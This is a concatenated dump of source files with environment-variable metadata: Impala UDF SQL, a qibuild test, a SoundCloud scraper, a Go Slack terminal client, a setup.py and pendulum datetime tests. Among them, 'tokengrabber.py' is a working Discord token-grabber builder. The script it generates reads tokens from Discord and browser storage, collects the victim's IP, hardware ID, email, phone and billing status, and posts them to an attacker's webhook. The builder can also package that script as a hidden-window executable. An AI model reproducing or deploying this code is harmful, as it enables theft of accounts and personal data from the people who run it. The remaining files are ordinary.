location '{location}'
symbol='_Z8IdentityPN10impala_udf15FunctionContextERKNS_7DateValE';
create function {database}.identity(decimal(9,0)) returns decimal(9,0)
location '{location}'
symbol='_Z8IdentityPN10impala_udf15FunctionContextERKNS_10DecimalValE';
create function {database}.identity(decimal(18,1)) returns decimal(18,1)
location '{location}'
symbol='_Z8IdentityPN10impala_udf15FunctionContextERKNS_10DecimalValE';
create function {database}.identity(decimal(38,10)) returns decimal(38,10)
location '{location}'
symbol='_Z8IdentityPN10impala_udf15FunctionContextERKNS_10DecimalValE';
create function {database}.all_types_fn(
string, boolean, tinyint, smallint, int, bigint, float, double, decimal(2,0),
date)
returns int
location '{location}' symbol='AllTypes';
create function {database}.no_args() returns string
location '{location}'
symbol='_Z6NoArgsPN10impala_udf15FunctionContextE';
create function {database}.var_and(boolean...) returns boolean
location '{location}' symbol='VarAnd';
create function {database}.var_sum(int...) returns int
location '{location}' symbol='VarSum';
create function {database}.var_sum(double...) returns double
location '{location}' symbol='VarSum';
create function {database}.var_sum(string...) returns int
location '{location}' symbol='VarSum';
create function {database}.var_sum(decimal(4,2)...) returns decimal(18,2)
location '{location}' symbol='VarSum';
create function {database}.var_sum_multiply(double, int...) returns double
location '{location}'
symbol='_Z14VarSumMultiplyPN10impala_udf15FunctionContextERKNS_9DoubleValEiPKNS_6IntValE';
create function {database}.constant_timestamp() returns timestamp
location '{location}' symbol='ConstantTimestamp';
create function {database}.constant_date() returns date
location '{location}' symbol='ConstantDate';
create function {database}.validate_arg_type(string) returns boolean
location '{location}' symbol='ValidateArgType';
create function {database}.count_rows() returns bigint
location '{location}' symbol='Count' prepare_fn='CountPrepare' close_fn='CountClose';
create function {database}.constant_arg(int) returns int
location '{location}' symbol='ConstantArg' prepare_fn='ConstantArgPrepare' close_fn='ConstantArgClose';
create function {database}.validate_open(int) returns boolean
location '{location}' symbol='ValidateOpen'
prepare_fn='ValidateOpenPrepare' close_fn='ValidateOpenClose';
create function {database}.mem_test(bigint) returns bigint
location '{location}' symbol='MemTest'
prepare_fn='MemTestPrepare' close_fn='MemTestClose';
create function {database}.mem_test_leaks(bigint) returns bigint
location '{location}' symbol='MemTest'
prepare_fn='MemTestPrepare';
"""
| []
| []
| [
"IMPALA_HIVE_MAJOR_VERSION",
"DEFAULT_FS"
]
| [] | ["IMPALA_HIVE_MAJOR_VERSION", "DEFAULT_FS"] | python | 2 | 0 | |
python/qibuild/test/projects/usefoopymodule/test.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2019 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
"""
This is an equivalent of a C++ program trying to load a
Python module using libqi, but written in Python.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import os
import sys
def main():
""" Main Entry Point """
from_env = os.environ.get("QI_ADDITIONAL_SDK_PREFIXES")
if not from_env:
sys.exit("QI_ADDITIONAL_SDK_PREFIXES not set")
prefixes = from_env.split(os.path.pathsep)
found = False
for prefix in prefixes:
candidate = os.path.join(prefix, "share", "qi", "module", "foo.mod")
if os.path.exists(candidate):
found = True
with open(candidate, "r") as fp:
contents = fp.read()
if contents != "python\n":
sys.exit("Expected python\\n, got: " + contents)
if not found:
sys.exit("foo.mod not found")
import foo
if __name__ == "__main__":
main()
| []
| []
| [
"QI_ADDITIONAL_SDK_PREFIXES"
]
| [] | ["QI_ADDITIONAL_SDK_PREFIXES"] | python | 1 | 0 | |
Additional_File/6_TokenGrab/tokengrabber.py | from colorama import Fore
import time, sys, os, ctypes, shutil
def tokengrabber():
def spinner():
l = ['|', '/', '-', '\\']
for i in l+l:
sys.stdout.write(f"""\r{y}[{b}#{y}]{w} Creating File... {i}""")
sys.stdout.flush()
time.sleep(0.2)
print('\n')
for i in l+l+l+l:
sys.stdout.write(f"""\r{y}[{b}#{y}]{w} Writing File... {i}""")
sys.stdout.flush()
time.sleep(0.2)
os.system('cls')
tokengrabbertitle()
print(f"""{y}[{w}+{y}]{w} Enter the name you want to give to the final file: """)
global filename
fileName = str(input(f"""{y}[{b}#{y}]{w} File name: """))
print(f"""\n\n{y}[{w}+{y}]{w} Enter your WebHook to generate a Token Grabber containing it: """)
global webhooklink
webhooklink = str(input(f"""{y}[{b}#{y}]{w} Webhook Link: """))
print('\n')
spinner()
try:
with open(f"temp/{fileName}.py", "w") as file:
file.write("""import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\\\Discord",
"Discord Canary" : ROAMING + "\\\\discordcanary",
"Discord PTB" : ROAMING + "\\\\discordptb",
"Google Chrome" : LOCAL + "\\\\Google\\\\Chrome\\\\User Data\\\\Default",
"Opera" : ROAMING + "\\\\Opera Software\\\\Opera Stable",
"Brave" : LOCAL + "\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default",
"Yandex" : LOCAL + "\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\\\Local Storage\\\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\\n")[1]
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def main():
cache_path = ROAMING + "\\\\.cache~$"
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\\nPhone: {phone}\\nNitro: {nitro}\\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\\nUsername: {pc_username}\\nPC Name: {pc_name}\\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Discord Token Grabber",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("~~TOKENURLHERE~~", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
main()""".replace("~~TOKENURLHERE~~", webhooklink))
except Exception as e:
print(f"""\n\n\n\n{y}[{Fore.LIGHTRED_EX }!{y}]{w} Error writing file: {e}""")
os.system(2)
os.system('cls')
main()
print(f"""\n\n\n{y}[{Fore.LIGHTGREEN_EX }!{y}]{w} File has been correctly written to "temp/{fileName}.py" """)
convert = input(f"""\n{y}[{b}#{y}]{w} Convert your script into an executable (Y/N) ? """)
if convert == 'Y' or convert == 'y':
time.sleep(1)
os.system('cls')
print(f'{y}[{b}#{y}]{w} File creation...')
time.sleep(1)
os.system(f"pyinstaller -y -F -w --distpath temp --specpath temp --workpath temp temp/{fileName}.py")
os.system('cls')
print(f'{y}[{b}#{y}]{w} Cleaning up old files...')
time.sleep(1)
os.remove(f"temp/{fileName}.spec")
shutil.rmtree(f"temp/{fileName}")
shutil.rmtree(f"temp/__pycache__")
time.sleep(1)
os.system('cls')
tokengrabbertitle()
print(f"""{y}[{Fore.LIGHTGREEN_EX }!{y}]{w} The executable file has been correctly generated""")
input(f"""{y}[{b}#{y}]{w} Press ENTER to exit""")
else:
input(f"""{y}[{b}#{y}]{w} Press ENTER to exit""")
main()
tokengrabber()
| []
| []
| [
"APPDATA",
"COMPUTERNAME",
"UserName",
"LOCALAPPDATA"
]
| [] | ["APPDATA", "COMPUTERNAME", "UserName", "LOCALAPPDATA"] | python | 4 | 0 | |
core/providers/soundcloud.py | import os
import requests
from bs4 import BeautifulSoup
from core.providers.base import MusicProvider
SOUNDCLOUD_CLIENT_ID = os.environ.get('SOUNDCLOUD_CLIENT_ID')
class SoundCloud(MusicProvider):
NAME = 'SoundCloud'
_MUSIC_URL = 'https://soundcloud.com/{}/{}'
def get_music_name(self, url):
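        # Scrape the public track page and derive a track name from its <title> tag.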
soundcloud_page = requests.get(url)
soup = BeautifulSoup(soundcloud_page.content, 'html.parser')
title_and_artist_tag = soup.find('title')
if title_and_artist_tag:
song_info = title_and_artist_tag.text.split('|')[0]
artist_and_title = song_info.split(' by ')[0]
# it is my observation, could be just some garbage in the name
if len(artist_and_title) > 40:
title = artist_and_title.split(' - ')[1]
return f'{title}'
return f'{artist_and_title}'
def get_music_url(self, name):
api_url = 'https://api-v2.soundcloud.com/search'
params = {
'q': name,
'client_id': SOUNDCLOUD_CLIENT_ID,
'limit': 1,
}
resp = requests.get(url=api_url, params=params)
resp.raise_for_status()
data = resp.json()
user = data['collection'][0]['user']['permalink']
track_link = data['collection'][0]['permalink']
url = self._MUSIC_URL.format(user, track_link)
return url
@classmethod
    def is_music_url(cls, url):
if 'soundcloud' in url:
return True
return False
| []
| []
| [
"SOUNDCLOUD_CLIENT_ID"
]
| [] | ["SOUNDCLOUD_CLIENT_ID"] | python | 1 | 0 | |
moonsla.go | package main
import (
"fmt"
"log"
"os"
"regexp"
"strconv"
"strings"
"time"
"github.com/logrusorgru/aurora"
"github.com/nlopes/slack"
)
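// getChannels returns a map of conversation ID to normalized channel name, following pagination cursors.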
func getChannels(api *slack.Client) (channels map[string]string) {
channels = make(map[string]string)
cursor := ""
for {
chans, newCursor, err := api.GetConversations(&slack.GetConversationsParameters{
Cursor: cursor,
ExcludeArchived: "true",
})
if err != nil {
panic(err)
}
for _, c := range chans {
channels[c.ID] = c.NameNormalized
}
		if newCursor == "" {
			// All pages fetched
			return
		}
cursor = newCursor
}
return
}
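// getDMs maps IM channel IDs to the real name of the user on the other side.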
func getDMs(api *slack.Client, users map[string]string) (channels map[string]string) {
channels = make(map[string]string)
chans, _ := api.GetIMChannels()
for _, c := range chans {
channels[c.ID] = users[c.User]
}
return channels
}
func getUsers(api *slack.Client) (users map[string]string) {
users = make(map[string]string)
allUsers, _ := api.GetUsers()
for _, u := range allUsers {
users[u.ID] = u.RealName
}
return users
}
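// getTimeStamp converts a Slack event timestamp such as "1530000000.000200" into a
// time.Time, keeping only the whole-second part.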
func getTimeStamp(ts string) (timeStamp time.Time, err error) {
i, err := strconv.ParseInt(strings.Split(ts, ".")[0], 10, 64)
if err != nil {
return time.Unix(0, 0), err
}
timeStamp = time.Unix(i, 0)
return timeStamp, nil
}
func formatMentions(msg string, users map[string]string) string {
re := regexp.MustCompile("<@U.*?>")
matches := re.FindAllString(msg, -1)
for _, m := range matches {
userID := m[2:(len(m) - 1)]
username, ok := users[userID]
if ok {
username = "@" + username
msg = strings.Replace(msg, m, username, -1)
}
}
return msg
}
func formatUrls(msg string) string {
// Formats slack url into hyperlinks https://gist.github.com/egmontkob/eb114294efbcd5adb1944c9f3cb5feda
// Setting MOONSLA_NO_HYPERLINKS=true will disable this for terminals which don't support it yet.
if os.Getenv("MOONSLA_NO_HYPERLINKS") != "" {
return msg
}
re := regexp.MustCompile("<http.*?>")
matches := re.FindAllString(msg, -1)
for _, m := range matches {
split := strings.Split(m[1:len(m)-1], "|")
// If this is just a plain url continue since we can't format it
if len(split) == 1 {
continue
}
url := split[0 : len(split)-1][0]
title := split[len(split)-1]
formatted := fmt.Sprintf("\x1b]8;;%s\a%s\x1b]8;;\a", url, title)
msg = strings.Replace(msg, m, formatted, -1)
}
return msg
}
func formatAttachments(attachments []slack.Attachment) string {
var messages []string
for _, a := range attachments {
text := a.Text
if a.Title != "" {
text = a.Title + ": " + text
}
messages = append(messages, text)
}
return strings.Join(messages, "\n")
}
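// filterChannel reports whether messages from the given channel should be shown,
// honouring the whitelist and blacklist, and returns the resolved channel name.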
func filterChannel(name string, channels map[string]string, whitelist []string, blacklist []string) (whitelisted bool, cName string) {
whitelisted = false
blacklisted := false
cName, ok := channels[name]
if ok {
for _, w := range whitelist {
if cName == w {
whitelisted = true
}
}
for _, w := range blacklist {
if cName == w {
blacklisted = true
}
}
} else {
whitelisted = true
cName = name
}
if len(whitelist) == 1 && whitelist[0] == "" {
whitelisted = true
}
if len(blacklist) == 1 && blacklist[0] == "" {
blacklisted = false
}
if blacklisted {
return false, cName
}
return whitelisted, cName
}
func minInt(a int, b int) int {
if a < b {
return a
}
return b
}
func takeN(text []string, n int) []string {
return text[:minInt(n, len(text))]
}
func trim(text string) string {
splits := strings.Split(text, "\n")
splitted := takeN(splits, 3)
if len(splits) > 3 {
splitted = append(splitted, "...")
}
return strings.Join(splitted, "\n")
}
func main() {
slackToken, ok := os.LookupEnv("SLACK_TOKEN")
if !ok {
fmt.Println("Please set your SLACK_TOKEN")
}
logger := log.New(os.Stdout, "slack-bot: ", log.Lshortfile|log.LstdFlags)
api := slack.New(
slackToken,
slack.OptionDebug(false),
slack.OptionLog(logger))
channels := getChannels(api)
fmt.Printf("Found %v channels\n", len(channels))
users := getUsers(api)
fmt.Printf("Found %v users\n", len(users))
dms := getDMs(api, users)
fmt.Printf("Found %v DMs\n", len(dms))
rtm := api.NewRTM()
go rtm.ManageConnection()
whitelist := strings.Split(strings.TrimSpace(os.Getenv("SLACK_CHANNELS")), ",")
fmt.Printf("Channel whitelist: %v\n", whitelist)
blacklist := strings.Split(strings.TrimSpace(os.Getenv("SLACK_BLACKLIST_CHANNELS")), ",")
fmt.Printf("Channel blacklist: %v\n", blacklist)
for msg := range rtm.IncomingEvents {
switch ev := msg.Data.(type) {
case *slack.MessageEvent:
whitelisted, cName := filterChannel(ev.Channel, channels, whitelist, blacklist)
isDm := false
// Map the users ID to a username if it exists
uName, ok := users[ev.User]
if !ok {
uName = ev.User
}
if ev.Username != "" {
uName = ev.Username
}
dmName, present := dms[ev.Channel]
if present {
cName = dmName
isDm = true
}
t, err := getTimeStamp(ev.EventTimestamp)
timeStamp := "00:00:00"
if err == nil {
timeStamp = fmt.Sprintf("%02d:%02d:%02d", t.Hour(), t.Minute(), t.Second())
}
text := ev.Text
if len(ev.Attachments) > 0 {
text = formatAttachments(ev.Attachments)
}
msg := formatMentions(text, users)
msg = formatUrls(msg)
if !whitelisted {
continue
}
if strings.TrimSpace(msg) == "" {
continue
}
msg = trim(msg)
msgC := aurora.Gray(20, msg)
if isDm {
msgC = aurora.Red(msg)
}
fmt.Printf("%v - %v - %v: %v\n", timeStamp, aurora.Green(cName), aurora.Blue(uName), msgC)
case *slack.RTMError:
fmt.Printf("Error: %s\n", ev.Error())
case *slack.InvalidAuthEvent:
fmt.Printf("Invalid credentials")
return
default:
// Ignore other events..
// fmt.Printf("Unexpected: %v\n", msg.Data)
}
}
}
| [
"\"MOONSLA_NO_HYPERLINKS\"",
"\"SLACK_CHANNELS\"",
"\"SLACK_BLACKLIST_CHANNELS\""
]
| []
| [
"SLACK_BLACKLIST_CHANNELS",
"MOONSLA_NO_HYPERLINKS",
"SLACK_CHANNELS"
]
| [] | ["SLACK_BLACKLIST_CHANNELS", "MOONSLA_NO_HYPERLINKS", "SLACK_CHANNELS"] | go | 3 | 0 | |
libraries/botbuilder-schema/setup.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import os
from setuptools import setup
NAME = "botbuilder-schema"
VERSION = os.environ["packageVersion"] if "packageVersion" in os.environ else "4.13.0"
REQUIRES = ["msrest==0.6.10"]
root = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(root, "README.rst"), encoding="utf-8") as f:
long_description = f.read()
setup(
name=NAME,
version=VERSION,
description="BotBuilder Schema",
author="Microsoft",
url="https://github.com/Microsoft/botbuilder-python",
keywords=["BotBuilderSchema", "bots", "ai", "botframework", "botbuilder"],
long_description=long_description,
long_description_content_type="text/x-rst",
license="MIT",
install_requires=REQUIRES,
packages=["botbuilder.schema", "botbuilder.schema.teams",],
include_package_data=True,
classifiers=[
"Programming Language :: Python :: 3.7",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Development Status :: 5 - Production/Stable",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
)
| []
| []
| [
"packageVersion"
]
| [] | ["packageVersion"] | python | 1 | 0 | |
tests/datetime/test_comparison.py | from datetime import datetime
import pendulum
import pytz
from ..conftest import assert_datetime
def test_equal_to_true():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d3 = datetime(2000, 1, 1, 1, 2, 3, tzinfo=pendulum.UTC)
assert d2 == d1
assert d3 == d1
def test_equal_to_false():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 2, 1, 2, 3)
d3 = datetime(2000, 1, 2, 1, 2, 3, tzinfo=pendulum.UTC)
assert d2 != d1
assert d3 != d1
def test_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 0, tz="America/Vancouver")
d3 = datetime(2000, 1, 1, 12, 0, 0, tzinfo=pendulum.timezone("America/Toronto"))
assert d2 == d1
assert d3 == d1
def test_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, tz="America/Vancouver")
d3 = datetime(2000, 1, 1, tzinfo=pendulum.timezone("America/Toronto"))
assert d2 != d1
assert d3 == d1
def test_not_equal_to_true():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 2, 1, 2, 3)
d3 = datetime(2000, 1, 2, 1, 2, 3, tzinfo=pendulum.UTC)
assert d2 != d1
assert d3 != d1
def test_not_equal_to_false():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d3 = datetime(2000, 1, 1, 1, 2, 3, tzinfo=pendulum.UTC)
assert d2 == d1
assert d3 == d1
def test_not_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, tz="America/Vancouver")
d3 = datetime(2000, 1, 1, tzinfo=pendulum.timezone("America/Toronto"))
assert d2 != d1
assert d3 == d1
def test_not_equal_to_none():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
assert d1 != None # noqa
def test_greater_than_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(1999, 12, 31)
d3 = datetime(1999, 12, 31, tzinfo=pendulum.UTC)
assert d1 > d2
assert d1 > d3
def test_greater_than_false():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert not d1 > d2
assert not d1 > d3
def test_greater_than_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz="America/Vancouver")
d3 = pytz.timezone("America/Vancouver").localize(datetime(2000, 1, 1, 8, 59, 59))
assert d1 > d2
assert d1 > d3
def test_greater_than_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz="America/Vancouver")
d3 = pytz.timezone("America/Vancouver").localize(datetime(2000, 1, 1, 9, 0, 1))
assert not d1 > d2
assert not d1 > d3
def test_greater_than_or_equal_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(1999, 12, 31)
d3 = datetime(1999, 12, 31, tzinfo=pendulum.UTC)
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_true_equal():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_false():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert not d1 >= d2
assert not d1 >= d3
def test_greater_than_or_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz="America/Vancouver")
d3 = pytz.timezone("America/Vancouver").localize(datetime(2000, 1, 1, 8, 59, 59))
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz="America/Vancouver")
d3 = pytz.timezone("America/Vancouver").localize(datetime(2000, 1, 1, 9, 0, 1))
assert not d1 >= d2
assert not d1 >= d3
def test_less_than_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert d1 < d2
assert d1 < d3
def test_less_than_false():
d1 = pendulum.datetime(2000, 1, 2)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert not d1 < d2
assert not d1 < d3
def test_less_than_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz="America/Vancouver")
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d3 = pytz.timezone("America/Toronto").localize(datetime(2000, 1, 1, 12, 0, 0))
assert d1 < d2
assert d1 < d3
def test_less_than_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz="America/Vancouver")
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d3 = pytz.timezone("America/Toronto").localize(datetime(2000, 1, 1, 12, 0, 0))
assert not d1 < d2
assert not d1 < d3
def test_less_than_or_equal_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_true_equal():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_false():
d1 = pendulum.datetime(2000, 1, 2)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert not d1 <= d2
assert not d1 <= d3
def test_less_than_or_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz="America/Vancouver")
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d3 = pytz.timezone("America/Toronto").localize(datetime(2000, 1, 1, 12, 0, 0))
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz="America/Vancouver")
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d3 = pytz.timezone("America/Toronto").localize(datetime(2000, 1, 1, 12, 0, 0))
assert not d1 <= d2
assert not d1 <= d3
def test_is_anniversary():
with pendulum.test(pendulum.now()):
d = pendulum.now()
an_anniversary = d.subtract(years=1)
assert an_anniversary.is_anniversary()
not_an_anniversary = d.subtract(days=1)
assert not not_an_anniversary.is_anniversary()
also_not_an_anniversary = d.add(days=2)
assert not also_not_an_anniversary.is_anniversary()
d1 = pendulum.datetime(1987, 4, 23)
d2 = pendulum.datetime(2014, 9, 26)
d3 = pendulum.datetime(2014, 4, 23)
assert not d2.is_anniversary(d1)
assert d3.is_anniversary(d1)
def test_is_birthday(): # backward compatibility
with pendulum.test(pendulum.now()):
d = pendulum.now()
an_anniversary = d.subtract(years=1)
assert an_anniversary.is_birthday()
not_an_anniversary = d.subtract(days=1)
assert not not_an_anniversary.is_birthday()
also_not_an_anniversary = d.add(days=2)
assert not also_not_an_anniversary.is_birthday()
d1 = pendulum.datetime(1987, 4, 23)
d2 = pendulum.datetime(2014, 9, 26)
d3 = pendulum.datetime(2014, 4, 23)
assert not d2.is_birthday(d1)
assert d3.is_birthday(d1)
def test_closest():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 11, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert closest == dt1
closest = instance.closest(dt2, dt1)
assert closest == dt1
dts = [
pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=x)
for x in range(4)
]
closest = instance.closest(*dts)
assert closest == dts[0]
closest = instance.closest(*(dts[::-1]))
assert closest == dts[0]
def test_closest_with_datetime():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = datetime(2015, 5, 28, 11, 0, 0)
dt2 = datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert_datetime(closest, 2015, 5, 28, 11, 0, 0)
dts = [
pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=x)
for x in range(4)
]
closest = instance.closest(dt1, dt2, *dts)
assert_datetime(closest, 2015, 5, 28, 11, 0, 0)
def test_closest_with_equals():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert closest == dt1
def test_farthest():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 11, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
farthest = instance.farthest(dt1, dt2)
assert farthest == dt2
farthest = instance.farthest(dt2, dt1)
assert farthest == dt2
dts = [
pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=x)
for x in range(4)
]
farthest = instance.farthest(*dts)
assert farthest == dts[-1]
farthest = instance.farthest(*(dts[::-1]))
assert farthest == dts[-1]
f = pendulum.datetime(2010, 1, 1, 0, 0, 0)
assert f == instance.farthest(f, *(dts))
def test_farthest_with_datetime():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = datetime(2015, 5, 28, 11, 0, 0, tzinfo=pendulum.UTC)
dt2 = datetime(2015, 5, 28, 14, 0, 0, tzinfo=pendulum.UTC)
farthest = instance.farthest(dt1, dt2)
assert_datetime(farthest, 2015, 5, 28, 14, 0, 0)
dts = [
pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=x)
for x in range(4)
]
farthest = instance.farthest(dt1, dt2, *dts)
assert_datetime(farthest, 2015, 5, 28, 19, 0, 0)
def test_farthest_with_equals():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
farthest = instance.farthest(dt1, dt2)
assert farthest == dt2
dts = [
pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=x)
for x in range(4)
]
farthest = instance.farthest(dt1, dt2, *dts)
